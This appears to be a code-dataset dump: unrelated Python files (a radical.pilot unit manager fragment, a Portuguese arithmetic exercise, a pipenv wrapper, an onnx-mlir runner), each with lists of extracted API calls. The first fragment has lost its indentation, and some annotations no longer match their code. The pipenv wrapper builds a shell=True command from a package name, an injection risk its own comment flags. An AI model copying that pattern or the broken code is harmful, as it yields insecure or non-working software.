If `uids` is `None`, `wait_units` returns when **all**
ComputeUnits reach the state defined in `state`. This may include
units which have previously terminated or waited upon.
**Example**::
# TODO -- add example
**Arguments:**
* **uids** [`string` or `list of strings`]
If uids is set, only the ComputeUnits with the specified
uids are considered. If uids is `None` (default), all
ComputeUnits are considered.
* **state** [`string`]
The state that ComputeUnits have to reach in order for the call
to return.
By default `wait_units` waits for the ComputeUnits to
reach a terminal state, which can be one of the following:
* :data:`radical.pilot.rps.DONE`
* :data:`radical.pilot.rps.FAILED`
* :data:`radical.pilot.rps.CANCELED`
* **timeout** [`float`]
Timeout in seconds before the call returns regardless of Pilot
state changes. The default value **None** waits forever.
"""
if not uids:
with self._units_lock:
uids = list()
for uid,unit in self._units.items():
if unit.state not in rps.FINAL:
uids.append(uid)
if not state : states = rps.FINAL
elif not isinstance(state, list): states = [state]
else : states = state
# we simplify state check by waiting for the *earliest* of the given
# states - if the unit happens to be in any later state, we are sure the
# earliest has passed as well.
check_state_val = rps._unit_state_values[rps.FINAL[-1]]
for state in states:
check_state_val = min(check_state_val,
rps._unit_state_values[state])
ret_list = True
if not isinstance(uids, list):
ret_list = False
uids = [uids]
start = time.time()
to_check = None
with self._units_lock:
to_check = [self._units[uid] for uid in uids]
# We don't want to iterate over all units again and again, as that would
# duplicate checks on units which were found in matching states. So we
# create a list from which we drop the units as we find them in
# a matching state
self._rep.progress_tgt(len(to_check), label='wait')
while to_check and not self._terminate.is_set():
# check timeout
if timeout and (timeout <= (time.time() - start)):
self._log.debug ("wait timed out")
break
time.sleep (0.1)
# FIXME: print percentage...
# print 'wait units: %s' % [[u.uid, u.state] for u in to_check]
check_again = list()
for unit in to_check:
# we actually don't check if a unit is in a specific (set of)
# state(s), but rather check if it ever *has been* in any of
# those states
if unit.state not in rps.FINAL and \
rps._unit_state_values[unit.state] < check_state_val:
# this unit does not match the wait criteria
check_again.append(unit)
else:
# stop watching this unit
if unit.state in [rps.FAILED]:
self._rep.progress() # (color='error', c='-')
elif unit.state in [rps.CANCELED]:
self._rep.progress() # (color='warn', c='*')
else:
self._rep.progress() # (color='ok', c='+')
to_check = check_again
self._rep.progress_done()
# grab the current states to return
state = None
with self._units_lock:
states = [self._units[uid].state for uid in uids]
sdict = {state: states.count(state) for state in set(states)}
for state in sorted(set(states)):
self._rep.info('\t%-10s: %5d\n' % (state, sdict[state]))
if to_check: self._rep.warn('>>timeout\n')
else : self._rep.ok ('>>ok\n')
# done waiting
if ret_list: return states
else : return states[0]
# --------------------------------------------------------------------------
#
def cancel_units(self, uids=None):
"""
Cancel one or more :class:`radical.pilot.ComputeUnits`.
Note that cancellation of units is *immediate*, i.e. their state is
immediately set to `CANCELED`, even if some RP component may still
operate on the units. Specifically, other state transitions, including
other final states (`DONE`, `FAILED`) can occur *after* cancellation.
This is a side effect of an optimization: we consider this
acceptable tradeoff in the sense "Oh, that unit was DONE at point of
cancellation -- ok, we can use the results, sure!".
If that behavior is not wanted, set the environment variable:
export RADICAL_PILOT_STRICT_CANCEL=True
**Arguments:**
* **uids** [`string` or `list of strings`]: The IDs of the
compute units objects to cancel.
"""
if not uids:
with self._units_lock:
uids = list(self._units.keys())
else:
if not isinstance(uids, list):
uids = [uids]
# NOTE: We advance all units to cancelled, and send a cancellation
# control command. If that command is picked up *after* some
# state progression, we'll see state transitions after cancel.
# For non-final states that is not a problem, as it is equivalent
# with a state update message race, which our state collapse
# mechanism accounts for. For an eventual non-canceled final
# state, we do get an invalid state transition. That is also
# corrected eventually in the state collapse, but the point
# remains, that the state model is temporarily violated. We
# consider this a side effect of the fast-cancel optimization.
#
# The env variable 'RADICAL_PILOT_STRICT_CANCEL == True' will
# disable this optimization.
#
# FIXME: the effect of the env var is not well tested
if 'RADICAL_PILOT_STRICT_CANCEL' not in os.environ:
with self._units_lock:
units = [self._units[uid] for uid in uids ]
unit_docs = [unit.as_dict() for unit in units]
self.advance(unit_docs, state=rps.CANCELED, publish=True, push=True)
# we *always* issue the cancellation command to the local components
self.publish(rpc.CONTROL_PUBSUB, {'cmd' : 'cancel_units',
'arg' : {'uids' : uids,
'umgr' : self.uid}})
# we also inform all pilots about the cancelation request
self._session._dbs.pilot_command(cmd='cancel_units', arg={'uids':uids})
# In the default case of calling 'advance' above, we just set the state,
# so we *know* units are canceled. But we nevertheless wait until that
# state progression trickled through, so that the application will see
# the same state on unit inspection.
self.wait_units(uids=uids)
# --------------------------------------------------------------------------
#
def register_callback(self, cb, cb_data=None, metric=None, uid=None):
"""
Registers a new callback function with the UnitManager. Manager-level
callbacks get called if the specified metric changes. The default
metric `UNIT_STATE` fires the callback if any of the ComputeUnits
managed by the PilotManager change their state.
All callback functions need to have the same signature::
def cb(obj, value)
where ``object`` is a handle to the object that triggered the callback,
``value`` is the metric, and ``data`` is the data provided on
callback registration.. In the example of `UNIT_STATE` above, the
object would be the unit in question, and the value would be the new
state of the unit.
If 'cb_data' is given, then the 'cb' signature changes to
def cb(obj, state, cb_data)
and 'cb_data' are passed unchanged.
If 'uid' is given, the callback will invoked only for the specified
unit.
Available metrics are:
* `UNIT_STATE`: fires when the state of any of the units which are
managed by this unit manager instance is changing. It communicates
the unit object instance and the units new state.
* `WAIT_QUEUE_SIZE`: fires when the number of unscheduled units (i.e.
of units which have not been assigned to a pilot for execution)
changes.
"""
# FIXME: the signature should be (self, metrics, cb, cb_data)
if not metric:
metric = rpc.UNIT_STATE
if metric not in rpc.UMGR_METRICS:
raise ValueError ("Metric '%s' not available on the umgr" % metric)
if not uid:
uid = '*'
elif uid not in self._units:
raise ValueError('no such unit %s' % uid)
with self._cb_lock:
cb_name = cb.__name__
if metric not in self._callbacks:
self._callbacks[metric] = dict()
if uid not in self._callbacks[metric]:
self._callbacks[metric][uid] = dict()
self._callbacks[metric][uid][cb_name] = {'cb' : cb,
'cb_data' : cb_data}
# --------------------------------------------------------------------------
#
def unregister_callback(self, cb=None, metrics=None, uid=None):
if not metrics: metrics = [rpc.UMGR_METRICS]
else : metrics = ru.as_list(metrics)
if not uid:
uid = '*'
elif uid not in self._units:
raise ValueError('no such unit %s' % uid)
for metric in metrics:
if metric not in rpc.UMGR_METRICS :
raise ValueError ("invalid umgr metric '%s'" % metric)
with self._cb_lock:
for metric in metrics:
if metric not in rpc.UMGR_METRICS :
raise ValueError("cb metric '%s' unknown" % metric)
if metric not in self._callbacks:
raise ValueError("cb metric '%s' invalid" % metric)
if uid not in self._callbacks[metric]:
raise ValueError("cb target '%s' invalid" % uid)
if cb:
to_delete = [cb.__name__]
else:
to_delete = list(self._callbacks[metric][uid].keys())
for cb_name in to_delete:
if cb_name not in self._callbacks[uid][metric]:
raise ValueError("cb %s not registered" % cb_name)
del(self._callbacks[uid][metric][cb_name])
# ------------------------------------------------------------------------------
| [
"radical.utils.RLock",
"os.environ.get",
"radical.utils.as_list",
"time.sleep",
"threading.Event",
"radical.utils.atfork",
"radical.utils.Config",
"time.time",
"radical.utils.generate_id"
] | [((2898, 2926), 'radical.utils.RLock', 'ru.RLock', (['"""umgr.pilots_lock"""'], {}), "('umgr.pilots_lock')\n", (2906, 2926), True, 'import radical.utils as ru\n'), ((2990, 3017), 'radical.utils.RLock', 'ru.RLock', (['"""umgr.units_lock"""'], {}), "('umgr.units_lock')\n", (2998, 3017), True, 'import radical.utils as ru\n'), ((3081, 3105), 'radical.utils.RLock', 'ru.RLock', (['"""umgr.cb_lock"""'], {}), "('umgr.cb_lock')\n", (3089, 3105), True, 'import radical.utils as ru\n'), ((3134, 3144), 'threading.Event', 'mt.Event', ([], {}), '()\n', (3142, 3144), True, 'import threading as mt\n'), ((3272, 3343), 'radical.utils.generate_id', 'ru.generate_id', (['"""umgr.%(item_counter)04d"""', 'ru.ID_CUSTOM'], {'ns': 'session.uid'}), "('umgr.%(item_counter)04d', ru.ID_CUSTOM, ns=session.uid)\n", (3286, 3343), True, 'import radical.utils as ru\n'), ((3832, 3883), 'radical.utils.Config', 'ru.Config', (['"""radical.pilot.umgr"""'], {'name': 'name', 'cfg': 'cfg'}), "('radical.pilot.umgr', name=name, cfg=cfg)\n", (3841, 3883), True, 'import radical.utils as ru\n'), ((6246, 6318), 'radical.utils.atfork', 'ru.atfork', (['self._atfork_prepare', 'self._atfork_parent', 'self._atfork_child'], {}), '(self._atfork_prepare, self._atfork_parent, self._atfork_child)\n', (6255, 6318), True, 'import radical.utils as ru\n'), ((32743, 32754), 'time.time', 'time.time', ([], {}), '()\n', (32752, 32754), False, 'import time\n'), ((407, 450), 'os.environ.get', 'os.environ.get', (['"""RADICAL_PILOT_BULK_CB"""', '""""""'], {}), "('RADICAL_PILOT_BULK_CB', '')\n", (421, 450), False, 'import os\n'), ((20685, 20704), 'radical.utils.as_list', 'ru.as_list', (['metrics'], {}), '(metrics)\n', (20695, 20704), True, 'import radical.utils as ru\n'), ((33425, 33440), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (33435, 33440), False, 'import time\n'), ((40888, 40907), 'radical.utils.as_list', 'ru.as_list', (['metrics'], {}), '(metrics)\n', (40898, 40907), True, 'import radical.utils as ru\n'), 
((33316, 33327), 'time.time', 'time.time', ([], {}), '()\n', (33325, 33327), False, 'import time\n')] |
'''Escreva um programa que solicite ao usuário dois números e apresente na tela os resultados das
operações aritméticas (soma, subtração, multiplicação, divisão, resto da divisão, exponenciação, radiciação)'''
import math
# Read the two operands from the user.
num1 = float(input('Informe um numero: '))
num2 = float(input('Informe outro numero: '))
print(f'a soma dos numeros sao: {num1+num2}')
print(f'a subtracao dos numeros sao: {num1-num2}')
print(f'a multiplicacao dos numeros sao: {num1*num2}')
print(f'a divisao dos numeros sao: {num1/num2}')
print(f'o resto da divisao dos numeros sao: {num1%num2}')
# Bug fix: the exercise asks for the exponentiation of the two numbers
# (num1 ** num2); math.exp(x) computes e**x, which is a different operation.
print(f'a exponenciacao dos numeros sao: {num1 ** num2}')
print(f'a radiciacao dos numeros sao: {math.sqrt(num1), math.sqrt(num2)}')
"math.exp",
"math.sqrt"
] | [((614, 628), 'math.exp', 'math.exp', (['num1'], {}), '(num1)\n', (622, 628), False, 'import math\n'), ((630, 644), 'math.exp', 'math.exp', (['num2'], {}), '(num2)\n', (638, 644), False, 'import math\n'), ((687, 702), 'math.sqrt', 'math.sqrt', (['num1'], {}), '(num1)\n', (696, 702), False, 'import math\n'), ((704, 719), 'math.sqrt', 'math.sqrt', (['num2'], {}), '(num2)\n', (713, 719), False, 'import math\n')] |
import os
import shutil
import subprocess
from possum.exc import PipenvPathNotFound
class PipenvWrapper:
    """Thin wrapper around the ``pipenv`` command-line tool.

    Resolves the ``pipenv`` executable once at construction time and funnels
    every operation through subprocess calls to that executable.
    """

    def __init__(self):
        # Resolve the pipenv executable from PATH; fail fast if absent.
        self.pipenv_path = shutil.which('pipenv')
        if not self.pipenv_path:
            raise PipenvPathNotFound
        # Force pipenv to ignore any currently active pipenv environment
        os.environ['PIPENV_IGNORE_VIRTUALENVS'] = '1'

    @property
    def venv_path(self):
        """Filesystem path of the project's virtual environment."""
        return self.get_virtual_environment_path()

    def create_virtual_environment(self):
        """Create a Python 3 virtual environment for the current project."""
        p = subprocess.Popen(
            [self.pipenv_path, '--three'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        p.communicate()

    def get_virtual_environment_path(self):
        """Return the path of the project's virtualenv as reported by pipenv."""
        p = subprocess.Popen(
            [self.pipenv_path, '--venv'],
            stdout=subprocess.PIPE
        )
        result = p.communicate()
        return result[0].decode('ascii').strip('\n')

    def get_site_packages(self):
        """Return the site-packages directory inside the project's virtualenv."""
        # Consistency fix: use the resolved executable path like every other
        # method instead of relying on a bare 'pipenv' being on PATH.
        return subprocess.check_output(
            [
                self.pipenv_path, 'run', 'python', '-c',
                'from distutils.sysconfig import get_python_lib; '
                'print(get_python_lib())'
            ],
            universal_newlines=True
        ).strip()

    def install_packages(self):
        """Install the project's dependencies from its Pipfile."""
        p = subprocess.Popen(
            [self.pipenv_path, 'install'],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL
        )
        p.communicate()

    def remove_virtualenv(self):
        """Delete the project's virtual environment."""
        p = subprocess.Popen(
            [self.pipenv_path, '--rm'],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL
        )
        p.communicate()

    def check_package_title(self, package):
        """Return ``package.__title__`` as seen inside the virtualenv.

        Falls back to the package name itself when the probe fails.
        """
        try:
            # Yes, this needs to be better, but performing this one-liner
            # though the Pipenv environment of the project only seems to work
            # when 'shell=True' is set.
            # SECURITY NOTE(review): shell=True interpolates `package` into a
            # shell command line; callers must not pass untrusted names here.
            return subprocess.check_output(
                f'{self.pipenv_path} run python -c "import '
                f'{package}; print({package}.__title__)"',
                shell=True, universal_newlines=True
            ).strip()
        except subprocess.CalledProcessError:
            return package
| [
"subprocess.check_output",
"subprocess.Popen",
"shutil.which"
] | [((159, 181), 'shutil.which', 'shutil.which', (['"""pipenv"""'], {}), "('pipenv')\n", (171, 181), False, 'import shutil\n'), ((527, 626), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, '--three']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "([self.pipenv_path, '--three'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n", (543, 626), False, 'import subprocess\n'), ((750, 820), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, '--venv']"], {'stdout': 'subprocess.PIPE'}), "([self.pipenv_path, '--venv'], stdout=subprocess.PIPE)\n", (766, 820), False, 'import subprocess\n'), ((1301, 1406), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, 'install']"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "([self.pipenv_path, 'install'], stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n", (1317, 1406), False, 'import subprocess\n'), ((1519, 1621), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, '--rm']"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "([self.pipenv_path, '--rm'], stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n", (1535, 1621), False, 'import subprocess\n'), ((990, 1157), 'subprocess.check_output', 'subprocess.check_output', (["['pipenv', 'run', 'python', '-c',\n 'from distutils.sysconfig import get_python_lib; print(get_python_lib())']"], {'universal_newlines': '(True)'}), "(['pipenv', 'run', 'python', '-c',\n 'from distutils.sysconfig import get_python_lib; print(get_python_lib())'\n ], universal_newlines=True)\n", (1013, 1157), False, 'import subprocess\n'), ((1957, 2111), 'subprocess.check_output', 'subprocess.check_output', (['f"""{self.pipenv_path} run python -c "import {package}; print({package}.__title__)\\""""'], {'shell': '(True)', 'universal_newlines': '(True)'}), '(\n f\'{self.pipenv_path} run python -c "import {package}; print({package}.__title__)"\'\n , shell=True, universal_newlines=True)\n', (1980, 2111), 
False, 'import subprocess\n')] |
import pytest
import envpy
import os
folder = os.path.dirname(__file__)
folder_env_file = f'{folder}/resources'
file_dot_env = 'test.env'


def test__init__():
    """Smoke test: load variables from the bundled .env file and print them."""
    karg = {'filepath': folder_env_file, 'filename': file_dot_env}
    # Parse the .env file once and reuse the result; the previous version
    # called envpy.get_variables twice and discarded the first result.
    variables = envpy.get_variables(**karg)
    envpy.printenv(variables)


if __name__ == "__main__":
    test__init__()
test__init__() | [
"os.path.dirname",
"envpy.get_variables"
] | [((47, 72), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (62, 72), False, 'import os\n'), ((230, 257), 'envpy.get_variables', 'envpy.get_variables', ([], {}), '(**karg)\n', (249, 257), False, 'import envpy\n'), ((277, 304), 'envpy.get_variables', 'envpy.get_variables', ([], {}), '(**karg)\n', (296, 304), False, 'import envpy\n')] |
import os
import sys
import argparse
import onnx
import time
import subprocess
import numpy as np
import tempfile
from onnx import numpy_helper
from collections import OrderedDict
# Command arguments.
parser = argparse.ArgumentParser()
parser.add_argument('model_path', type=str, help="Path to the ONNX model.")
parser.add_argument('--print_input',
                    action='store_true',
                    help="Print out inputs")
parser.add_argument('--print_output',
                    action='store_true',
                    help="Print out outputs")
parser.add_argument('--compile_args',
                    type=str,
                    default="",
                    help="Arguments passed directly to onnx-mlir command."
                    " See bin/onnx-mlir --help")
parser.add_argument(
    '--shape_info',
    type=str,
    help="Shape for each dynamic input, e.g. 0:1x10x20,1:7x5x3")
parser.add_argument('--verify',
                    choices=['onnxruntime', 'ref'],
                    help="Verify the output by using onnxruntime or reference"
                    " inputs/outputs. By default, no verification")
parser.add_argument(
    '--ref_folder',
    type=str,
    help="Path to the folder containing reference inputs and outputs stored"
    " in protobuf. Used when --verify=ref")
parser.add_argument('--rtol',
                    type=str,
                    default="0.05",
                    help="Relative tolerance for verification")
parser.add_argument('--atol',
                    type=str,
                    default="0.01",
                    help="Absolute tolerance for verification")
args = parser.parse_args()
# The onnx-mlir compiler is located through the ONNX_MLIR_HOME env variable.
if (not os.environ.get('ONNX_MLIR_HOME', None)):
    raise RuntimeError(
        "Environment variable ONNX_MLIR_HOME is not set, please set it to the path to "
        "the HOME directory for onnx-mlir. The HOME directory for onnx-mlir refers to "
        "the parent folder containing the bin, lib, etc sub-folders in which ONNX-MLIR "
        "executables and libraries can be found.")
# Any non-empty VERBOSE value enables command echoing in execute_commands().
VERBOSE = os.environ.get('VERBOSE', False)
ONNX_MLIR_EXENAME = "onnx-mlir"
if sys.platform == "win32":
    ONNX_MLIR_EXENAME = "onnx-mlir.exe"
ONNX_MLIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "bin",
                         ONNX_MLIR_EXENAME)
# Include runtime directory in python paths, so PyRuntime can be imported.
RUNTIME_DIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "lib")
sys.path.append(RUNTIME_DIR)
try:
    from PyRuntime import ExecutionSession
except ImportError:
    raise ImportError(
        "Looks like you did not build the PyRuntime target, build it by running `make PyRuntime`."
    )
def ordinal(n):
    """Return *n* with its English ordinal suffix, e.g. 1 -> '1st', 12 -> '12th'."""
    if 11 <= n % 100 <= 13:
        # 11th, 12th and 13th are irregular.
        return str(n) + 'th'
    suffix_by_digit = {1: 'st', 2: 'nd', 3: 'rd'}
    return str(n) + suffix_by_digit.get(n % 10, 'th')
def execute_commands(cmds):
    """Run the given command line through the shell.

    Echoes the command first when the module-level VERBOSE flag is set.
    """
    if (VERBOSE):
        print(cmds)
    subprocess.call(cmds, shell=True)
def extend_model_output(model, intermediate_outputs):
    """Replace the model's graph outputs with the named intermediate tensors."""
    # onnx-mlir doesn't care about manually specified output types & shapes,
    # so a dummy float tensor type with unknown shape is good enough.
    dummy_type = onnx.TensorProto.FLOAT
    del model.graph.output[:]
    value_infos = [
        onnx.helper.make_tensor_value_info(name, dummy_type, None)
        for name in intermediate_outputs
    ]
    model.graph.output.extend(value_infos)
    return model
def read_input_from_refs(model, ref_folder):
    """Load reference inputs (protobuf tensors) for every non-initializer input.

    Returns a tuple ``(inputs, input_names)`` of numpy arrays and the
    corresponding graph input names.
    """
    print("Reading inputs from {} ...".format(ref_folder))
    initializer_names = {init.name for init in model.graph.initializer}
    inputs = []
    input_names = []
    idx = 0
    for input_proto in model.graph.input:
        # Initializers also appear under graph.input; skip them.
        if input_proto.name in initializer_names:
            continue
        input_names.append(input_proto.name)
        tensor = onnx.TensorProto()
        with open('{}/input_{}.pb'.format(ref_folder, idx), 'rb') as f:
            tensor.ParseFromString(f.read())
        inputs.append(numpy_helper.to_array(tensor))
        idx += 1
    print("  done.\n")
    return (inputs, input_names)
def read_output_from_refs(model, ref_folder):
    """Load the reference outputs (protobuf tensors), one per graph output."""
    print("Reading reference outputs from {} ...".format(ref_folder))
    reference_output = []
    for i in range(len(model.graph.output)):
        tensor = onnx.TensorProto()
        with open('{}/output_{}.pb'.format(ref_folder, i), 'rb') as f:
            tensor.ParseFromString(f.read())
        reference_output.append(numpy_helper.to_array(tensor))
    print("  done.\n")
    return reference_output
def generate_random_input(model, input_shapes):
    """Generate deterministic random float32 inputs for the model.

    ``input_shapes`` maps an input index to explicit dims used for any
    dynamic dimension; the process exits with a message when a dynamic
    dimension has no entry.  Returns ``(inputs, input_names)``.
    """
    print("Generating random inputs ...")
    # Generate random data as input.
    inputs = []
    input_names = []
    initializers = list(map(lambda x: x.name, model.graph.initializer))
    # Fixed seed so repeated runs compare identical inputs.
    np.random.seed(42)
    for i, input_proto in enumerate(model.graph.input):
        # Initializers also appear under graph.input; skip them.
        # NOTE(review): `i` counts all graph inputs including initializers,
        # so --shape_info indices are relative to that full list — confirm.
        if input_proto.name in initializers:
            continue
        input_names.append(input_proto.name)
        shape_proto = input_proto.type.tensor_type.shape
        explicit_shape = []
        for d, dim in enumerate(shape_proto.dim):
            if dim.dim_value:
                explicit_shape.append(dim.dim_value)
                continue
            # Dynamic dimension: take it from --shape_info or bail out.
            if i in input_shapes:
                if d < len(input_shapes[i]):
                    explicit_shape.append(input_shapes[i][d])
                else:
                    print("The {} dim".format(ordinal(d + 1)),
                          "of the {} input is unknown.".format(ordinal(i + 1)),
                          "Use --shape_info to set.")
                    print(shape_proto)
                    exit()
            else:
                print("The shape of the {} input".format(ordinal(i + 1)),
                      "is unknown. Use --shape_info to set.")
                print(shape_proto)
                exit()
        inputs.append(
            np.random.uniform(-1.0, 1.0, explicit_shape).astype(np.float32))
    print("  done.\n")
    return (inputs, input_names)
def main():
    """Compile ``args.model_path`` with onnx-mlir, run it, optionally verify.

    Verification ('--verify') compares the run's outputs either against
    onnxruntime on the same model or against reference protobuf outputs.
    """
    # Get shape information if given.
    # args.shape_info in the form of 'input_index:d1xd2, input_index:d1xd2'
    input_shapes = {}
    if args.shape_info:
        for input_shape in args.shape_info.strip().split(","):
            input_index_shape = input_shape.split(":")
            input_index = input_index_shape[0]
            assert not (input_index in input_shapes), "Duplicate input indices"
            dims = [int(d) for d in input_index_shape[1].split("x")]
            input_shapes[int(input_index)] = dims
    # Load the onnx model.
    model = onnx.load(args.model_path)
    # Get the output names that we want to verify.
    # If using onnxruntime for verification, we can verify every operation output.
    output_names = [o.name for o in model.graph.output]
    output_names = list(OrderedDict.fromkeys(output_names))
    if (args.verify and args.verify == "onnxruntime"):
        # Expose every intermediate tensor as a graph output so each one
        # can be compared against onnxruntime.
        output_names = sum([[n for n in node.output if n != '']
                             for node in model.graph.node], [])
        output_names = list(OrderedDict.fromkeys(output_names))
        model = extend_model_output(model, output_names)
    # Compile, run, and verify.
    with tempfile.TemporaryDirectory() as temp_dir:
        print("Temporary directory has been created at {}".format(temp_dir))
        print("Compiling the model ...")
        # Save modified model & invoke onnx-mlir to compile it.
        temp_model_path = os.path.join(temp_dir, "model.onnx")
        onnx.save(model, temp_model_path)
        command_str = ONNX_MLIR
        if args.compile_args:
            command_str += " " + args.compile_args
        command_str += " " + temp_model_path
        start = time.perf_counter()
        execute_commands(command_str)
        end = time.perf_counter()
        print("  took ", end - start, " seconds.\n")
        # Prepare input data.
        inputs = []
        input_names = []
        if (args.verify and args.verify.lower() == "ref"):
            assert args.ref_folder, "No reference folder given"
            inputs, input_names = read_input_from_refs(model, args.ref_folder)
        else:
            inputs, input_names = generate_random_input(model, input_shapes)
        # Print the input if required.
        if (args.print_input):
            for i, inp in enumerate(inputs):
                print("The {} input {}:{} is: \n {} \n".format(
                    ordinal(i + 1), input_names[i], list(inp.shape), inp))
        print("Running inference ...")
        # onnx-mlir emits the compiled model next to the .onnx as model.so.
        temp_shared_lib_path = os.path.join(temp_dir, "model.so")
        start = time.perf_counter()
        # Use the generated shared library to create an execution session.
        sess = ExecutionSession(temp_shared_lib_path, "run_main_graph")
        outs = sess.run(inputs)
        end = time.perf_counter()
        print("  took ", end - start, " seconds.\n")
        # Print the output if required.
        if (args.print_output):
            for i, out in enumerate(outs):
                print("The {} output {}:{} is: \n {} \n".format(
                    ordinal(i + 1), output_names[i], list(out.shape), out))
        # Run the model with reference backend and get results.
        if (args.verify):
            ref_outs = []
            if (args.verify.lower() == "onnxruntime"):
                # Reference backend by using onnxruntime.
                import onnxruntime
                output_names = list(map(lambda x: x.name, model.graph.output))
                input_feed = dict(zip(input_names, inputs))
                print("Running inference using onnxruntime ...")
                start = time.perf_counter()
                ref_session = onnxruntime.InferenceSession(temp_model_path)
                ref_outs = ref_session.run(output_names, input_feed)
                end = time.perf_counter()
                print("  took ", end - start, " seconds.\n")
            elif (args.verify.lower() == "ref"):
                ref_outs = read_output_from_refs(model, args.ref_folder)
            else:
                print("Invalid verify option")
                exit()
            # For each output tensor, compare results.
            for i, name in enumerate(output_names):
                print("Verifying value of {}:{}".format(name, list(outs[i].shape)),
                      "using atol={}, rtol={} ...".format(args.atol, args.rtol))
                total_elements = 0
                mismatched_elements = 0
                for index, actual_val in np.ndenumerate(outs[i]):
                    total_elements += 1
                    ref_val = ref_outs[i][index]
                    # Use equation atol + rtol * abs(desired), that is used in assert_allclose.
                    diff = float(args.atol) + float(args.rtol) * abs(ref_val)
                    if (abs(actual_val - ref_val) <= diff):
                        continue
                    mismatched_elements += 1
                    print("  at {}".format(index),
                          "mismatch {} (actual)".format(actual_val),
                          "vs {} (reference)".format(ref_val))
                if mismatched_elements == 0:
                    # NOTE(review): the .format() arguments below are unused.
                    print("  correct.\n".format(
                        args.atol, args.rtol))
                else:
                    print("  mismatched elements {}/{}.\n".format(
                        mismatched_elements, total_elements))
if __name__ == '__main__':
    main()
| [
"PyRuntime.ExecutionSession",
"tempfile.TemporaryDirectory",
"onnx.save",
"collections.OrderedDict.fromkeys",
"argparse.ArgumentParser",
"onnx.helper.make_tensor_value_info",
"os.path.join",
"os.environ.get",
"time.perf_counter",
"onnxruntime.InferenceSession",
"onnx.TensorProto",
"numpy.ndenu... | [((212, 237), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (235, 237), False, 'import argparse\n'), ((2061, 2093), 'os.environ.get', 'os.environ.get', (['"""VERBOSE"""', '(False)'], {}), "('VERBOSE', False)\n", (2075, 2093), False, 'import os\n'), ((2208, 2276), 'os.path.join', 'os.path.join', (["os.environ['ONNX_MLIR_HOME']", '"""bin"""', 'ONNX_MLIR_EXENAME'], {}), "(os.environ['ONNX_MLIR_HOME'], 'bin', ONNX_MLIR_EXENAME)\n", (2220, 2276), False, 'import os\n'), ((2392, 2441), 'os.path.join', 'os.path.join', (["os.environ['ONNX_MLIR_HOME']", '"""lib"""'], {}), "(os.environ['ONNX_MLIR_HOME'], 'lib')\n", (2404, 2441), False, 'import os\n'), ((2442, 2470), 'sys.path.append', 'sys.path.append', (['RUNTIME_DIR'], {}), '(RUNTIME_DIR)\n', (2457, 2470), False, 'import sys\n'), ((1669, 1707), 'os.environ.get', 'os.environ.get', (['"""ONNX_MLIR_HOME"""', 'None'], {}), "('ONNX_MLIR_HOME', None)\n", (1683, 1707), False, 'import os\n'), ((2897, 2930), 'subprocess.call', 'subprocess.call', (['cmds'], {'shell': '(True)'}), '(cmds, shell=True)\n', (2912, 2930), False, 'import subprocess\n'), ((4850, 4868), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (4864, 4868), True, 'import numpy as np\n'), ((6651, 6677), 'onnx.load', 'onnx.load', (['args.model_path'], {}), '(args.model_path)\n', (6660, 6677), False, 'import onnx\n'), ((3256, 3328), 'onnx.helper.make_tensor_value_info', 'onnx.helper.make_tensor_value_info', (['output_name', 'DUMMY_TENSOR_TYPE', 'None'], {}), '(output_name, DUMMY_TENSOR_TYPE, None)\n', (3290, 3328), False, 'import onnx\n'), ((4384, 4402), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (4400, 4402), False, 'import onnx\n'), ((6893, 6927), 'collections.OrderedDict.fromkeys', 'OrderedDict.fromkeys', (['output_names'], {}), '(output_names)\n', (6913, 6927), False, 'from collections import OrderedDict\n'), ((7274, 7303), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], 
{}), '()\n', (7301, 7303), False, 'import tempfile\n'), ((7526, 7562), 'os.path.join', 'os.path.join', (['temp_dir', '"""model.onnx"""'], {}), "(temp_dir, 'model.onnx')\n", (7538, 7562), False, 'import os\n'), ((7571, 7604), 'onnx.save', 'onnx.save', (['model', 'temp_model_path'], {}), '(model, temp_model_path)\n', (7580, 7604), False, 'import onnx\n'), ((7779, 7798), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (7796, 7798), False, 'import time\n'), ((7851, 7870), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (7868, 7870), False, 'import time\n'), ((8618, 8652), 'os.path.join', 'os.path.join', (['temp_dir', '"""model.so"""'], {}), "(temp_dir, 'model.so')\n", (8630, 8652), False, 'import os\n'), ((8669, 8688), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (8686, 8688), False, 'import time\n'), ((8779, 8835), 'PyRuntime.ExecutionSession', 'ExecutionSession', (['temp_shared_lib_path', '"""run_main_graph"""'], {}), "(temp_shared_lib_path, 'run_main_graph')\n", (8795, 8835), False, 'from PyRuntime import ExecutionSession\n'), ((8882, 8901), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (8899, 8901), False, 'import time\n'), ((3865, 3883), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (3881, 3883), False, 'import onnx\n'), ((4523, 4555), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['output_ts'], {}), '(output_ts)\n', (4544, 4555), False, 'from onnx import numpy_helper\n'), ((7139, 7173), 'collections.OrderedDict.fromkeys', 'OrderedDict.fromkeys', (['output_names'], {}), '(output_names)\n', (7159, 7173), False, 'from collections import OrderedDict\n'), ((4004, 4035), 